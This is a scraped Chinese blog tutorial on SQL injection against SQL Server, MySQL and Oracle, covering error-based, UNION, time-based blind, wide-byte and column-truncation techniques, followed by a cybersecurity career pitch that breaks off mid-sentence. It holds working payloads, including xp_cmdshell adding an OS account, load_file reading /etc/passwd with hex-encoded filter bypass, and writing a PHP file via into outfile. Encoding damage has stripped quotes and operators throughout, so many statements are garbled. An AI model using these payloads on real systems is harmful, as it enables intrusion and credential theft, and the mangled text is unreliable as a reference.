開(kāi)發(fā)網(wǎng)站的基本過(guò)程,輿情監(jiān)控一般多少錢(qián),建設(shè)網(wǎng)站專(zhuān)業(yè)公司,wordpress功能小工具欄SQL 注入原理 SQL注入攻擊指的是通過(guò)構(gòu)建特殊的輸入作為參數(shù)傳入Web應(yīng)用程序#xff0c;而這些輸入大都是SQL語(yǔ)法里的一些組合#xff0c;通過(guò)執(zhí)行SQL語(yǔ)句進(jìn)而執(zhí)行攻擊者所要的操作#xff0c;其主要原因是程序沒(méi)有細(xì)致地過(guò)濾用戶(hù)輸入的數(shù)據(jù)#xff0c;致使非法數(shù)據(jù)侵入系…SQL 注入原理SQL注入攻擊指的是通過(guò)構(gòu)建特殊的輸入作為參數(shù)傳入Web應(yīng)用程序而這些輸入大都是SQL語(yǔ)法里的一些組合通過(guò)執(zhí)行SQL語(yǔ)句進(jìn)而執(zhí)行攻擊者所要的操作其主要原因是程序沒(méi)有細(xì)致地過(guò)濾用戶(hù)輸入的數(shù)據(jù)致使非法數(shù)據(jù)侵入系統(tǒng)。SQL 注入分類(lèi)1. 數(shù)字型注入當(dāng)輸入的參數(shù)為整型時(shí)則有可能存在數(shù)字型注入漏洞。假設(shè)存在一條 URL 為HTTP://www.aaa.com/test.php?id1可以對(duì)后臺(tái)的 SQL 語(yǔ)句猜測(cè)為SELECT * FROM table WHERE id1判斷數(shù)字型漏洞的 SQL 注入點(diǎn)① 先在輸入框中輸入一個(gè)單引號(hào)這樣的 SQL 語(yǔ)句就會(huì)變?yōu)镾ELECT * FROM table WHERE id1不符合語(yǔ)法所以該語(yǔ)句肯定會(huì)出錯(cuò)導(dǎo)致腳本程序無(wú)法從數(shù)據(jù)庫(kù)獲取數(shù)據(jù)從而使原來(lái)的頁(yè)面出現(xiàn)異常。② 在輸入框中輸入and 1 1SQL語(yǔ)句變?yōu)镾ELECT * FROM table WHERE id1 and 1 1語(yǔ)句正確執(zhí)行正常返回的數(shù)據(jù)與原始請(qǐng)求無(wú)任何差異。③ 在數(shù)據(jù)庫(kù)中輸入and 1 2SQL 語(yǔ)句變?yōu)镾ELECT * FROM table WHERE id1 and 1 2雖然語(yǔ)法正確語(yǔ)句執(zhí)行正常但是邏輯錯(cuò)誤因?yàn)?1 2 為永假所以返回?cái)?shù)據(jù)與原始請(qǐng)求有差異。如果以上三個(gè)步驟全部滿(mǎn)足則程序就可能存在數(shù)字型 SQL 注入漏洞。2. 字符型注入當(dāng)輸入?yún)?shù)為字符串時(shí)則可能存在字符型注入漏洞。數(shù)字型與字符型注入最大的區(qū)別在于數(shù)字型不需要單引號(hào)閉合而字符型一般需要使用單引號(hào)來(lái)閉合。字符型注入最關(guān)鍵的是如何閉合 SQL 語(yǔ)句以及注釋多余的代碼。假設(shè)后臺(tái)的 SQL 語(yǔ)句如下SELECT * FROM table WHERE username admin判斷字符型漏洞的 SQL 注入點(diǎn)① 還是先輸入單引號(hào)admin來(lái)測(cè)試這樣的 SQL 語(yǔ)句就會(huì)變?yōu)镾ELECT * FROM table WHERE username admin。頁(yè)面異常。② 輸入admin and 1 1 --注意在 admin 后有一個(gè)單引號(hào)用于字符串閉合最后還有一個(gè)注釋符--(兩條杠后面還有一個(gè)空格)。SQL 語(yǔ)句變?yōu)镾ELECT * FROM table WHERE username ‘a(chǎn)dmin’ and 1 1 –頁(yè)面顯示正確。③ 輸入admin and 1 2 --SQL 語(yǔ)句變?yōu)镾ELECT * FROM table WHERE username admin and 1 2 --頁(yè)面錯(cuò)誤。滿(mǎn)足上面三個(gè)步驟則有可能存在字符型 SQL 注入。3. 其他類(lèi)型其實(shí)我覺(jué)得 SQL 注入只有兩種類(lèi)型數(shù)字型與字符型。很多人可能會(huì)說(shuō)還有如Cookie 注入、POST 注入、延時(shí)注入等。的確如此但這些類(lèi)型的注入歸根結(jié)底也是數(shù)字型和字符型注入的不同展現(xiàn)形式或者注入的位置不同罷了。以下是一些常見(jiàn)的注入叫法POST注入注入字段在 POST 數(shù)據(jù)中Cookie注入注入字段在 Cookie 數(shù)據(jù)中延時(shí)注入使用數(shù)據(jù)庫(kù)延時(shí)特性注入搜索注入注入處為搜索的地方base64注入注入字符串需要經(jīng)過(guò) base64 加密常見(jiàn)數(shù)據(jù)庫(kù)的注入攻擊者對(duì)于數(shù)據(jù)庫(kù)注入無(wú)非是利用數(shù)據(jù)庫(kù)獲取更多的數(shù)據(jù)或者更大的權(quán)限利用的方式可以歸結(jié)為以下幾類(lèi)查詢(xún)數(shù)據(jù)讀寫(xiě)文件執(zhí)行命令攻擊者對(duì)于程序注入無(wú)論任何數(shù)據(jù)庫(kù)無(wú)非都是在做這三件事只不過(guò)不同的數(shù)據(jù)庫(kù)注入的 SQL 語(yǔ)句不一樣罷了。這里介紹三種數(shù)據(jù)庫(kù)的注入Oracle 11g、MySQL 5.1 和 SQL Server 2008。SQL Server1. 利用錯(cuò)誤消息提取信息SQL Server 數(shù)據(jù)庫(kù)是一個(gè)非常優(yōu)秀的數(shù)據(jù)庫(kù)它可以準(zhǔn)確地定位錯(cuò)誤信息這對(duì)攻擊者來(lái)說(shuō)是一件十分美好的事情因?yàn)楣粽呖梢酝ㄟ^(guò)錯(cuò)誤消息提取自己想要的數(shù)據(jù)。① 枚舉當(dāng)前表或者列假設(shè)選擇存在這樣一張表查詢(xún) root 用戶(hù)的詳細(xì)信息SQL 語(yǔ)句猜測(cè)如下SELECT * FROM user WHERE username root AND password root攻擊者可以利用 SQL Server 特性來(lái)獲取敏感信息在輸入框中輸入如下語(yǔ)句 having 1 1 --最終執(zhí)行的 SQL 語(yǔ)句就會(huì)變?yōu)镾ELECT * FROM user WHERE username root AND password root HAVING 1 1 --那么 SQL 的執(zhí)行器可能會(huì)拋出一個(gè)錯(cuò)誤攻擊者就可以發(fā)現(xiàn)當(dāng)前的表名為 user、而且存在字段 id。攻擊者可以利用此特性繼續(xù)得到其他列名輸入如下語(yǔ)句’ GROUP BY users.id HAVING 1 1 –則 SQL 語(yǔ)句變?yōu)镾ELECT * FROM user WHERE username root AND password root GROUP BY users.id HAVING 1 1 --拋出錯(cuò)誤由此可以看到包含列名 username?？梢砸淮芜f歸查詢(xún)知道沒(méi)有錯(cuò)誤消息返回位置這樣就可以利用 HAVING 字句得到當(dāng)表的所有列名。注Select指定的每一列都應(yīng)該出現(xiàn)在Group By子句中除非對(duì)這一列使用了聚合函數(shù)②. 利用數(shù)據(jù)類(lèi)型錯(cuò)誤提取數(shù)據(jù)如果試圖將一個(gè)字符串與非字符串比較或者將一個(gè)字符串轉(zhuǎn)換為另一個(gè)不兼容的類(lèi)型那么SQL 編輯器將會(huì)拋出異常。如下列 SQL 語(yǔ)句SELECT * FROM user WHERE username abc AND password abc AND 1 (SELECT TOP 1 username FROM users)執(zhí)行器錯(cuò)誤提示這就可以獲取到用戶(hù)的用戶(hù)名為 root。因?yàn)樵谧硬樵?xún)SELECT TOP 1 username FROM users中將查詢(xún)到的用戶(hù)名的第一個(gè)返回返回類(lèi)型是 varchar 類(lèi)型然后要跟 int 類(lèi)型的 1 比較兩種類(lèi)型不同的數(shù)據(jù)無(wú)法比較而報(bào)錯(cuò)從而導(dǎo)致了數(shù)據(jù)泄露。利用此方法可以遞歸推導(dǎo)出所有的賬戶(hù)信息SELECT * FROM users WHERE username abc AND password abc AND 1 (SELECT TOP 1 username FROM users WHERE not in (root))。通過(guò)構(gòu)造此語(yǔ)句就可以獲得下一個(gè) 用戶(hù)名若把子查詢(xún)中的 username 換成其他列名則可以獲取其他列的信息這里就不再贅述。2. 獲取元數(shù)據(jù)SQL Server 提供了大量視圖便于取得元數(shù)據(jù)?？梢韵炔聹y(cè)出表的列數(shù)然后用 UNION 來(lái)構(gòu)造 SQL 語(yǔ)句獲取其中的數(shù)據(jù)。如SELECT *** FROM *** WHERE id *** UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES若當(dāng)前表的列數(shù)為 2則可以 UNION 語(yǔ)句獲取當(dāng)前數(shù)據(jù)庫(kù)表。具體怎么猜測(cè)當(dāng)前表的列數(shù)后面進(jìn)行描述。一些常用的系統(tǒng)數(shù)據(jù)庫(kù)視圖3. ORDER BY 子句猜測(cè)列數(shù)可以用 ORDER BY 語(yǔ)句來(lái)判斷當(dāng)前表的列數(shù)。如①SELECT * FROM users WHERE id 1——SQL執(zhí)行正常②SELECT * FROM users WHERE id 1 ORDER BY 1(按照第一列排序)——SQL執(zhí)行正常③SELECT * FROM users WHERE id 1 ORDER BY 2(按照第二列排序)——SQL執(zhí)行正常④SELECT * FROM users WHERE id 1 ORDER BY 3(按照第三列排序)——SQL 執(zhí)行正常⑤SELECT * FROM users WHERE id 1 ORDER BY 4(按照第四列排序)——SQL 拋出異常由此可以得出當(dāng)前表的列數(shù)只有 3 列因?yàn)楫?dāng)按照第 4 列排序時(shí)報(bào)錯(cuò)了。在 Oracle 和 MySql 數(shù)據(jù)庫(kù)中同樣適用此方法。在得知列數(shù)后攻擊者通常會(huì)配合 UNION 關(guān)鍵字進(jìn)行下一步的攻擊。4. UNION 查詢(xún)UNION 關(guān)鍵字將兩個(gè)或多個(gè)查詢(xún)結(jié)果組合為單個(gè)結(jié)果集大部分?jǐn)?shù)據(jù)庫(kù)都支持 UNION 查詢(xún)。但適用 UNION 合并兩個(gè)結(jié)果有如下基本規(guī)則所有查詢(xún)中的列數(shù)必須相同數(shù)據(jù)類(lèi)型必須兼容① 用 UNION 查詢(xún)猜測(cè)列數(shù)不僅可以用 ORDER BY 方法來(lái)猜測(cè)列數(shù)UNION 方法同樣可以。在之前假設(shè)的 user 表中有 5 列若我們用 UNION 聯(lián)合查詢(xún)SELECT * FROM users WHERE id 1 UNION SELECT 1數(shù)據(jù)庫(kù)會(huì)發(fā)出異?？梢酝ㄟ^(guò)遞歸查詢(xún)直到無(wú)錯(cuò)誤產(chǎn)生就可以得知 User 表的查詢(xún)字段數(shù)UNION SELECT 1,2、UNION SELECT 1,2,3也可以將 SELECT 后面的數(shù)字改為 null、這樣不容易出現(xiàn)不兼容的異常。② 聯(lián)合查詢(xún)敏感信息在得知列數(shù)為 4后可以使用一下語(yǔ)句繼續(xù)注入U(xiǎn)NION SELECT x, null, null, null FROM SYSOBJECT WHERE xtypeU(注xtype‘U’ 表示對(duì)象類(lèi)型是表)若第一列的數(shù)據(jù)類(lèi)型不匹配數(shù)據(jù)庫(kù)會(huì)報(bào)錯(cuò)那么可以遞歸查詢(xún)直到語(yǔ)句兼容。等到語(yǔ)句正常執(zhí)行就可以將 x 換為 SQL 語(yǔ)句查詢(xún)敏感信息。5. 利用SQL Server 提供的系統(tǒng)函數(shù)SQL Server 提供了非常多的系統(tǒng)函數(shù)利用該系統(tǒng)函數(shù)可以訪問(wèn) SQL Server 系統(tǒng)表中的信息而無(wú)需使用 SQL 查詢(xún)語(yǔ)句。如SELECT suser_name()返回用戶(hù)的登錄標(biāo)識(shí)名SELECT user_name()基于指定的標(biāo)識(shí)號(hào)返回?cái)?shù)據(jù)庫(kù)用戶(hù)名SELECT db_name()返回?cái)?shù)據(jù)庫(kù)名SELECT is_member(‘db_owner’)是否為數(shù)據(jù)庫(kù)角色SELECT convert(int, ‘5’)數(shù)據(jù)類(lèi)型轉(zhuǎn)換6. 存儲(chǔ)過(guò)程存儲(chǔ)過(guò)程 (Stored Procedure) 是在大型數(shù)據(jù)庫(kù)系統(tǒng)中為了完成特定功能的一組 SQL “函數(shù)”如執(zhí)行系統(tǒng)命令、查看注冊(cè)表、讀取磁盤(pán)目錄等。攻擊者最長(zhǎng)使用的存儲(chǔ)過(guò)程是 “xp_cmdshell”這個(gè)存儲(chǔ)過(guò)程允許用戶(hù)執(zhí)行操作系統(tǒng)命令。例如http://www.aaa.org/test.aspx?id1中存在注入點(diǎn)那么攻擊者就可以實(shí)施命令攻擊http://www.aaa.org/test.aspx?id1exec xp_cmdshell net user test test /add最終執(zhí)行的 SQL 語(yǔ)句如下SELECT * FROM table WHERE id1; exec xp_cmdshell net user test test /add分號(hào)后面的那一段語(yǔ)句就可以為攻擊者在對(duì)方服務(wù)器上新建一個(gè)用戶(hù)名為 test、密碼為 test 的用戶(hù)。注并不是任何數(shù)據(jù)庫(kù)用戶(hù)都可以使用此類(lèi)存儲(chǔ)過(guò)程用戶(hù)必須持有 CONTROL SERVER 權(quán)限。常見(jiàn)的危險(xiǎn)存儲(chǔ)過(guò)程如下表另外任何數(shù)據(jù)庫(kù)在使用一些特殊的函數(shù)或存儲(chǔ)過(guò)程時(shí)都需要特定的權(quán)限。常見(jiàn)的SQL Server 數(shù)據(jù)庫(kù)的角色與權(quán)限如下7. 動(dòng)態(tài)執(zhí)行SQL Server 支持動(dòng)態(tài)執(zhí)行語(yǔ)句用戶(hù)可以提交一個(gè)字符串來(lái)執(zhí)行 SQL 語(yǔ)句。如exec(SELECT username, password FROM users)也可以通過(guò)定義十六進(jìn)制的 SQL 語(yǔ)句使用 exec 函數(shù)執(zhí)行。大部分 Web 應(yīng)用程序和防火墻都過(guò)濾了單引號(hào)利用 exec 執(zhí)行十六進(jìn)制 SQL 語(yǔ)句可以突破很多防火墻及防注入程序如declare query varchar(888)select query0x73656C6563742031exec(query)或者declare/**/query/**/varchar(888)/**/select/**/query0x73656C6563742031/**/exec(query)MySQL前面詳細(xì)講述了 SQL Server 的注入過(guò)程在注入其他數(shù)據(jù)庫(kù)時(shí)基本思路是相同的只不過(guò)兩者使用的函數(shù)或者是語(yǔ)句稍有差異。1. MySQL 中的注釋MySQL 支持以下 3 中注釋風(fēng)格“#”注釋從 “#” 到行尾-- 注釋從 “-- ”序列到行位需要注意的是使用此注釋時(shí)后面需要跟上空格/**/注釋從 /* 到 */ 之間的字符2. 獲取元數(shù)據(jù)MySQL 5.0 及其以上版本提供了 INFORMATION_SCHEMA這是一個(gè)信息數(shù)據(jù)庫(kù)它提供了訪問(wèn)數(shù)據(jù)庫(kù)元數(shù)據(jù)的方式。下面介紹如何從中讀取數(shù)據(jù)庫(kù)名稱(chēng)、表名稱(chēng)以及列名稱(chēng)。① 查詢(xún)用戶(hù)數(shù)據(jù)庫(kù)名稱(chēng)SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATAINFORMATION_SCHEMA.SCHEMATA 表提供了關(guān)于數(shù)據(jù)庫(kù)的信息。②查詢(xún)當(dāng)前數(shù)據(jù)表SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA (SELECT DATABASE())INFORMATION_SCHEMA.TABLES 表給出了數(shù)據(jù)庫(kù)中表的信息。③查詢(xún)指定表的所有字段SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME ***INFORMATION_SCHEMA.COLUMNS 表中給出了表中的列信息。3. UNION 查詢(xún)與 SQL Server 大致相同此處不贅述。4. MySQL 函數(shù)利用無(wú)論是 MySQL、Oracle 還是其他數(shù)據(jù)庫(kù)都內(nèi)置了許多系統(tǒng)函數(shù)這些數(shù)據(jù)庫(kù)函數(shù)都非常類(lèi)似接下來(lái)介紹一些對(duì)滲透測(cè)試人員很有幫助的 MySQL 函數(shù)。① load_file() 函數(shù)讀文件操作MySQL 提供了 load_file() 函數(shù)可以幫助用戶(hù)快速讀取文件但文件的位置必須在服務(wù)器上文件必須為絕對(duì)路徑且用戶(hù)必須有 FILE 權(quán)限文件容量也必須小于 max_allowed_packet 字節(jié) (默認(rèn)為 16MB最大為 1GB)。SQL 語(yǔ)句如下UNION SELECT 1, load_file(/etc/passwd), 3, 4 #通常一些防注入語(yǔ)句不允許單引號(hào)出現(xiàn)那么可以使用一下語(yǔ)句繞過(guò)UNION SELECT 1, load_file(0x2F6561342F706173737764), 3, 4 #“0x2F6561342F706173737764” 為 “/etc/passwd” 的十六進(jìn)制轉(zhuǎn)換結(jié)果。在瀏覽器返回?cái)?shù)據(jù)時(shí)有可能存在亂碼問(wèn)題那么可以使用 hex() 函數(shù)將字符串轉(zhuǎn)換為十六進(jìn)制數(shù)據(jù)。② into outfile 寫(xiě)文件操作MySQL 提供了向磁盤(pán)寫(xiě)文件的操作與 load_file() 一樣必須有 FILE 權(quán)限并且文件必須為全路徑名稱(chēng)。寫(xiě)入文件SELECT ?php phpinfo();? into oufile C:wwwroot1.php③ 連接字符串MySQL 如果需要一次查詢(xún)多個(gè)數(shù)據(jù)可以使用 concat() 或 concat_ws() 函數(shù)來(lái)完成。SELECT name FROM student WHERE id 1 UNION SELECT concat(user(), ,, database(), ,, version());也可以將逗號(hào)改用十六進(jìn)制表示0x2c5. MySQL 顯錯(cuò)式注入MySQL 也存在顯錯(cuò)式注入可以像 SQL Server 數(shù)據(jù)庫(kù)那樣使用錯(cuò)誤提取消息。① 通過(guò) updatexml 函數(shù)執(zhí)行 SQL 語(yǔ)句首先了解下updatexml()函數(shù)updatexml (XML_document, XPath_string, new_value);第一個(gè)參數(shù)XML_document是String格式為XML文檔對(duì)象的名稱(chēng)第二個(gè)參數(shù)XPath_string (Xpath格式的字符串) 第三個(gè)參數(shù)new_valueString格式替換查找到的符合條件的數(shù)據(jù)SELECT * FROM message WHERE id 1 and updatexml(1, (concat(0x7c, (SELECT version))), 1)其中的concat()函數(shù)是將其連成一個(gè)字符串因此不會(huì)符合XPATH_string的格式從而出現(xiàn)格式錯(cuò)誤報(bào)錯(cuò)會(huì)顯示出無(wú)法識(shí)別的內(nèi)容② 通過(guò) extractvalue函數(shù)SEELCT * FROM message WHERE id 1 AND extravtvalue(1, concat(0x7c, (SELECT user())))同樣報(bào)錯(cuò)顯示出當(dāng)前用戶(hù)6. 寬字節(jié)注入寬字節(jié)注入是由編碼不統(tǒng)一所造成的這種注入一般出現(xiàn)在 PHP MySQL中。在 PHP 配置文件 php.ini 中存在 magic_quotes_gpc 選項(xiàng)被稱(chēng)為魔術(shù)引號(hào)當(dāng)此選項(xiàng)被打開(kāi)時(shí)使用 GET、POST、Cookie 所接受的 單引號(hào)(’)、雙引號(hào)()、反斜線() 和 NULL 字符都會(huì)自動(dòng)加上一個(gè)反斜線轉(zhuǎn)義。如下使用 PHP 代碼使用 $_GET 接收參數(shù)如訪問(wèn)URLhttp:/www.xxser.com/Get.php?id顯示如下單引號(hào)被轉(zhuǎn)義后就變成了在 MySQL 中是一個(gè)合法的字符也就沒(méi)辦法閉合單引號(hào)所以注入類(lèi)型是字符型時(shí)無(wú)法構(gòu)成注入。但是若是輸入%d5訪問(wèn)URLhttp:/www.xxser.com/Get.php?id%d5顯示如下可以發(fā)現(xiàn)這次單引號(hào)沒(méi)有被轉(zhuǎn)義這樣就可以突破 PHP 轉(zhuǎn)義繼續(xù)閉合 SQL 語(yǔ)句進(jìn)行 SQL 注入。7. MySQL 長(zhǎng)字符截?cái)郙ySQL 超長(zhǎng)字符截?cái)嘤置?“SQL-Column-Truncation”。在 MySQL 中的一個(gè)設(shè)置里有一個(gè) sql_mode 選項(xiàng)當(dāng) sql_mode 設(shè)置為 default 時(shí)即沒(méi)有開(kāi)啟 STRICT——ALL_TABLES 選項(xiàng)時(shí)MySQL 對(duì)插入超長(zhǎng)的值只會(huì)提示 waring而不是 error。假設(shè)有一張表如下username 字段的長(zhǎng)度為 7。分別插入一下 SQL 語(yǔ)句① 插入正常 SQL 語(yǔ)句INSERT users(id, username, password) VALUES(1, ‘a(chǎn)dmin’, ‘a(chǎn)dmin’);成功插入。② 插入錯(cuò)誤的 SQL 語(yǔ)句使 username 字段的長(zhǎng)度超過(guò)7INSERT users(id, username, password) VALUES(2, admin , admin);雖然有警告但是成功插入了。③ 再?lài)L試插入一條錯(cuò)誤的 SQL 語(yǔ)句長(zhǎng)度同一超過(guò)原有的規(guī)定長(zhǎng)度INSERT users(id, username, password) VALUES(3, admin x), admin;查詢(xún)數(shù)據(jù)庫(kù)可以看到三條數(shù)據(jù)都被插入到數(shù)據(jù)庫(kù)中但是值發(fā)生了變化。在默認(rèn)情況下如果數(shù)據(jù)超出默認(rèn)長(zhǎng)度MySQL 會(huì)將其階段。但是這樣怎么攻擊呢通過(guò)查詢(xún)用戶(hù)名為 admin 的用戶(hù)可以發(fā)現(xiàn)只查詢(xún)用戶(hù)名為 admin 的用戶(hù)但是另外兩個(gè)長(zhǎng)度不一致的 admin 用戶(hù)也被查詢(xún)出這樣就會(huì)造成一些安全問(wèn)題。比如有一處管理員登錄時(shí)這樣判斷的$sql SELECT count(*) FROM users WHERE username admin AND password ***;那么攻擊者只需要注冊(cè)一個(gè)長(zhǎng)度超過(guò)規(guī)定長(zhǎng)度的用戶(hù)名“admin ”即可輕易進(jìn)入后臺(tái)管理頁(yè)面。8. 延時(shí)注入延時(shí)注入屬于盲注技術(shù)的一種是一種基于時(shí)間差異的注入技術(shù)。下面以 MySQL 為例介紹延時(shí)注入。在 MySQL 中有一個(gè)函數(shù)sleep(duration)這個(gè)函數(shù)意思是在 duration 參數(shù)給定數(shù)秒后運(yùn)行語(yǔ)句如下 SQL 語(yǔ)句SELECT * FROM users WHERE id 1 AND sleep(3)就是將在 3 秒后執(zhí)行該 SQL 語(yǔ)句?？梢允褂眠@個(gè)函數(shù)來(lái)判斷 URL 是否存在 SQL 注入漏洞步驟如下通過(guò)頁(yè)面返回的世界可以斷定DBMS 執(zhí)行了and sleep(3)語(yǔ)句這樣一來(lái)就可以判斷出 URL 存在 SQL 注入漏洞。然后通過(guò) sleep() 函數(shù)還可以讀出數(shù)據(jù)但需要其他函數(shù)的配合步驟如下①查詢(xún)當(dāng)前用戶(hù)并取得字符串長(zhǎng)度執(zhí)行SQL 語(yǔ)句AND if(length(user()) 0, sleep(3), 1)如果出現(xiàn) 3 秒延時(shí)就可以判斷出 user 字符串長(zhǎng)度注入時(shí)通常會(huì)采用折半算法減少判斷。② 截取字符串第一個(gè)字符并轉(zhuǎn)換為 ASCII 碼AND if(hex(mid(user(), 1, 1)) 1, sleep(3), 1)AND if(hex(mid(user(), 1, 1)) 2, sleep(3), 1)……不斷更換 ASCII 碼直到出現(xiàn)延時(shí) 3 秒就可以猜測(cè)出第一個(gè)字符。③ 遞歸截取字符串每一個(gè)字符分別于 ASCII 碼比較AND if(hex(mid(user(), L, 1)) N, sleep(3), 1)注L 的位置代表字符串的第幾個(gè)字符N 的位置代表 ASCII 碼。不僅在 MySQL 中存在延時(shí)函數(shù)在 SQL Server、Oracle 等數(shù)據(jù)庫(kù)中也都存在類(lèi)似功能的函數(shù)如 SQL Server 的 waitfor delay、Oracle 中的 DBMS_LOCK.SLEEP 等函數(shù)。Oracle1. 獲取元數(shù)據(jù)Oracle 也支持查詢(xún)?cè)獢?shù)據(jù)下面是 Oracle 注入常用的元數(shù)據(jù)視圖① user_tablespaces 視圖查看表空間SELECT tablespace_name FROM user_tablespaces② user_tables 視圖查看當(dāng)前用戶(hù)的所有表SELECT table_name FROM user_tables WHERE rownum 1③ user_tab_columns 視圖查看當(dāng)前用戶(hù)的所有列如查詢(xún) user 表的所有列SELECT column_name FROM user_tab_columns WHERE table_name users④ all_users 視圖查看 ORacle 數(shù)據(jù)庫(kù)的所有用戶(hù)SELECT username FROM all_users⑤ user_objects 視圖查看當(dāng)前用戶(hù)的所有對(duì)象 (表名稱(chēng)、約束、索引)SELECT object_name FROM user_objects2. UNION 查詢(xún)Oracle 與 MySQL 一樣不支持多語(yǔ)句執(zhí)行不像 SQL Server 那樣可以用分號(hào)隔開(kāi)從而注入多條 SQL 語(yǔ)句。①獲取列的總數(shù)獲取列總數(shù)方法與前面兩種數(shù)據(jù)庫(kù)類(lèi)似依然可以使用 ORDER BY 子句來(lái)完成。另一種方法是利用 UNION 關(guān)鍵字來(lái)確定但是 Oracle 規(guī)定每次查詢(xún)時(shí)后面必須跟表的名稱(chēng)否則查詢(xún)將不成立。在 Oracle 中可以使用UNION SELECT null, null, null …… FROM dual這里的 dual 是 Oracle 中的虛擬表在不知道數(shù)據(jù)庫(kù)中存在哪些表的情況下可以使用此表作為查詢(xún)表。然后獲取非數(shù)字類(lèi)型列即可以顯示出信息的列UNION SELECT null, null, null, …… FROM dualUNION SELECT null, null, null, …… FROM dual把每一位的null依次用單引號(hào) ’ 引起來(lái)如果報(bào)錯(cuò)則不是字符串類(lèi)型的列如果返回正常則是字符串類(lèi)型的列就可以在相應(yīng)的位置插入查詢(xún)語(yǔ)句獲取信息。② 獲取敏感信息常見(jiàn)的敏感信息如下當(dāng)前用戶(hù)權(quán)限SELECT * FROM session_roles當(dāng)前數(shù)據(jù)庫(kù)版本SELECT banner FROM sys.v_$version WHERE rownum 1服務(wù)器出口 IP用utl_http.request可以實(shí)現(xiàn)服務(wù)器監(jiān)聽(tīng) IPSELECT utl_inaddr.get_host_address FROM dual服務(wù)器操作系統(tǒng)SELECT member FROM v$logfile WHERE rownum 1服務(wù)器 SIDSELECT instance_name FROM v$instance當(dāng)前連接用戶(hù)SELECT SYS_CONTEXT(USERENV, CURRENT_USER) FROM dual③ 獲取數(shù)據(jù)庫(kù)表及其內(nèi)容在得知表的列數(shù)之后可以通過(guò)查詢(xún)?cè)獢?shù)據(jù)的方式查詢(xún)表名稱(chēng)、列名稱(chēng)然后查詢(xún)數(shù)據(jù)如http://www.aaa.org/new.jsp?id1 UNION SELECT username, password, null FROM users –注意在查詢(xún)數(shù)據(jù)時(shí)同樣要注意數(shù)據(jù)類(lèi)型否則無(wú)法查詢(xún)只能一一測(cè)試改變參數(shù)的查詢(xún)位置。計(jì)算機(jī)熱門(mén)就業(yè)方向從目前市場(chǎng)情況來(lái)講網(wǎng)絡(luò)安全的就業(yè)前景是非常不錯(cuò)的2022年的統(tǒng)計(jì)數(shù)據(jù)網(wǎng)絡(luò)安全專(zhuān)業(yè)的缺口已經(jīng)增長(zhǎng)到140萬(wàn)人。1、就業(yè)崗位多發(fā)展方向廣①就業(yè)環(huán)境網(wǎng)絡(luò)安全可以在計(jì)算機(jī)科學(xué)與技術(shù)、信息通信、電子商務(wù)、互聯(lián)網(wǎng)金融、電子政務(wù)等領(lǐng)域從事相關(guān)工作還可以在政府機(jī)關(guān)事業(yè)單位、銀行、保險(xiǎn)、證券等金融機(jī)構(gòu)電信、傳媒等行業(yè)從事相關(guān)工作。②就業(yè)崗位網(wǎng)絡(luò)安全工程師、滲透測(cè)試工程師、代碼審計(jì)工程師、等級(jí)保護(hù)工程師、安全運(yùn)維工程師、安全運(yùn)營(yíng)工程師、安全服務(wù)工程師等。2、薪資待遇可觀提升較快作為一個(gè)新興行業(yè)網(wǎng)絡(luò)安全人才的市場(chǎng)需求遠(yuǎn)遠(yuǎn)大于供給企業(yè)想真正招到人才就必須在薪酬福利上有足夠的競(jìng)爭(zhēng)優(yōu)勢(shì)。因此網(wǎng)絡(luò)安全領(lǐng)域的薪資近年來(lái)也呈現(xiàn)穩(wěn)步增長(zhǎng)的態(tài)勢(shì)。根據(jù)工信部發(fā)布的《網(wǎng)絡(luò)安全產(chǎn)業(yè)人才發(fā)展報(bào)告》顯示網(wǎng)絡(luò)安全人才平均年薪為21.28萬(wàn)元整體薪資水平較高。數(shù)據(jù)顯示網(wǎng)絡(luò)安全人才年薪主要集中在10-20萬(wàn)元占比40.62%與往年持平其次是20-30萬(wàn)元占比為38.43%較2020年占比19.48%有顯著提高而年薪在10萬(wàn)以下人才占比由2020年的19.74%下降至2022年的9.08%。由此可見(jiàn)網(wǎng)絡(luò)安全行業(yè)作為新興賽道尚在快速發(fā)展階段從業(yè)人員薪資水平提升較快也顯示出網(wǎng)絡(luò)安全行業(yè)相對(duì)更重視人才留存。3、職業(yè)發(fā)展空間大從網(wǎng)絡(luò)安全專(zhuān)業(yè)學(xué)習(xí)的主要內(nèi)容來(lái)看包括linux運(yùn)維、Python開(kāi)發(fā)、滲透測(cè)試、代碼審計(jì)、等級(jí)保護(hù)、應(yīng)急響應(yīng)、風(fēng)險(xiǎn)評(píng)估等?？梢?jiàn)該網(wǎng)絡(luò)安全專(zhuān)業(yè)的技術(shù)性很強(qiáng)具有鮮明的專(zhuān)業(yè)特點(diǎn)是一門(mén)能夠?qū)W到真正技術(shù)的工科類(lèi)專(zhuān)業(yè)之一。因此在職業(yè)發(fā)展上網(wǎng)絡(luò)安全專(zhuān)業(yè)除了就業(yè)崗位眾多之外由于專(zhuān)業(yè)技術(shù)性較強(qiáng)在工作單位將處于技術(shù)核心骨干地位職業(yè)發(fā)展空間很大。盤(pán)點(diǎn)網(wǎng)絡(luò)安全的崗位匯總01崗位一滲透測(cè)試工程師崗位釋義模擬黑客攻擊利用黑客技術(shù)挖掘漏洞提出修復(fù)建議。有些大廠例如奇安信甚至?xí)B透崗位分為紅藍(lán)兩方對(duì)候選人的技術(shù)要求比較高大部分剛?cè)胄械男氯艘矊B透崗位作為后期的發(fā)展目標(biāo)。崗位職責(zé)負(fù)責(zé)對(duì)客戶(hù)網(wǎng)絡(luò)、系統(tǒng)、應(yīng)用進(jìn)行滲透測(cè)試、安全評(píng)估和安全加固在出現(xiàn)網(wǎng)絡(luò)攻擊或安全事件時(shí)提供應(yīng)急響應(yīng)服務(wù)幫助用戶(hù)恢復(fù)系統(tǒng)及調(diào)查取證針對(duì)客戶(hù)網(wǎng)絡(luò)架構(gòu)建議合理的網(wǎng)絡(luò)安全解決方案工作難度5顆星薪資現(xiàn)狀02崗位二安全運(yùn)維工程師崗位釋義維護(hù)網(wǎng)絡(luò)系統(tǒng)的正常、安全運(yùn)行如果受到黑客攻擊則需要進(jìn)行應(yīng)急響應(yīng)和入侵排查安全加固。很多剛畢業(yè)入行的新人基本都從運(yùn)維做起。崗位職責(zé)日常終端維護(hù)操作系統(tǒng)安裝加固完成網(wǎng)絡(luò)安全設(shè)備故障排查、處置完成相關(guān)管理制度文檔的編寫(xiě)和提交工作難度3顆星薪資現(xiàn)狀03崗位三安